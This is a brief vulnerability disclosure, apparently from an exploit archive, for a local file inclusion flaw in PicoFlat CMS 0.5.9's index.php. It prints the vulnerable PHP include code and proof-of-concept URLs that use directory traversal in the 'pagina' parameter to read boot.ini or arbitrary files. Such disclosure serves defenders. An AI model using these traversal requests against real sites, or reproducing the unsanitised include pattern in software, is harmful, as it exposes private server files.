PicoFlat CMS version 0.5.9 suffers from a local file inclusion vulnerability in index.php. This uses the same variable that had a remote file inclusion vulnerability back in October of 2007.
92188ef0a3d4e5e0aee53acb9dbd05e7---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini
site name picoflatcms 0.5.9
download http://picoflat.altervista.org/index.php?
by gmda
<!-- gmda@email.it -->
---------------------------------------------------------------------------
bug code
<?php if (eregi('://', $pagina) || eregi('\?', $pagina)) {
$pagina = "";
include "notfound.php";
}else{
include $pagina; }
?>
p.o.c
http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini
http://127.0.0.1/path/index.php?pagina=[file]
Comments
No comments yet, be the first!